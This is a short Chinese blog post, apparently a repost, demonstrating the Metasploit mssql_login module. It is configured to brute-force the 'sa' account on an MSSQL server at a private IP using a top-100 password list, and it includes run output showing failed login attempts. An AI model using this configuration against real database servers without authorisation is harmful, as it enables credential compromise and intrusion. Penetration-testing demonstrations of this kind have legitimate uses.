MSF爆破MSSQL

show options:

 

msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   BLANK_PASSWORDS      false                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS         false                                     no        Add all users in the current database to the list
   PASSWORD                                                       no        A specific password to authenticate with
   PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line
   RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier
   RPORT                1433                                      yes       The target port (TCP)
   STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                                         yes       The number of concurrent threads
   USERNAME             sa                                        no        A specific username to authenticate as
   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false                                     no        Try the username as the password for all users
   USER_FILE                                                      no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true                                      yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > run 

[*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.
[!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:npdx123! (Incorrect: )

 

转载于:https://www.cnblogs.com/nul1/p/8824263.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值